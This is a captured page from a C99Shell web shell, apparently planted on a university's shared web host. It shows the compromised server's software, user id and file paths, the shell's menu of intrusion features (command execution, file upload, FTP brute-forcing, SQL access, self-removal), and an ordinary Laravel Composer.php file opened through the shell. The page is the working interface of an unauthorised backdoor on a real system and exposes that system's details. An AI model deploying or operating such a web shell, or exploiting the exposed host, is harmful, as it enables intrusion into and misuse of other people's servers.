!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Support/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Composer.php (2.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Support;

use 
Illuminate\Filesystem\Filesystem;
use 
Symfony\Component\Process\Process;
use 
Symfony\Component\Process\ProcessUtils;
use 
Symfony\Component\Process\PhpExecutableFinder;

class 
Composer
{
    
/**
     * The filesystem instance.
     *
     * @var \Illuminate\Filesystem\Filesystem
     */
    
protected $files;

    
/**
     * The working path to regenerate from.
     *
     * @var string
     */
    
protected $workingPath;

    
/**
     * Create a new Composer manager instance.
     *
     * @param  \Illuminate\Filesystem\Filesystem  $files
     * @param  string|null  $workingPath
     * @return void
     */
    
public function __construct(Filesystem $files$workingPath null)
    {
        
$this->files $files;
        
$this->workingPath $workingPath;
    }

    
/**
     * Regenerate the Composer autoloader files.
     *
     * @param  string  $extra
     * @return void
     */
    
public function dumpAutoloads($extra '')
    {
        
$process $this->getProcess();

        
$process->setCommandLine(trim($this->findComposer().' dump-autoload '.$extra));

        
$process->run();
    }

    
/**
     * Regenerate the optimized Composer autoloader files.
     *
     * @return void
     */
    
public function dumpOptimized()
    {
        
$this->dumpAutoloads('--optimize');
    }

    
/**
     * Get the composer command for the environment.
     *
     * @return string
     */
    
protected function findComposer()
    {
        if (! 
$this->files->exists($this->workingPath.'/composer.phar')) {
            return 
'composer';
        }

        
$binary ProcessUtils::escapeArgument((new PhpExecutableFinder)->find(false));

        if (
defined('HHVM_VERSION')) {
            
$binary .= ' --php';
        }

        return 
"{$binary} composer.phar";
    }

    
/**
     * Get a new Symfony process instance.
     *
     * @return \Symfony\Component\Process\Process
     */
    
protected function getProcess()
    {
        return (new 
Process(''$this->workingPath))->setTimeout(null);
    }

    
/**
     * Set the working path used by the class.
     *
     * @param  string  $path
     * @return $this
     */
    
public function setWorkingPath($path)
    {
        
$this->workingPath realpath($path);

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0505 ]--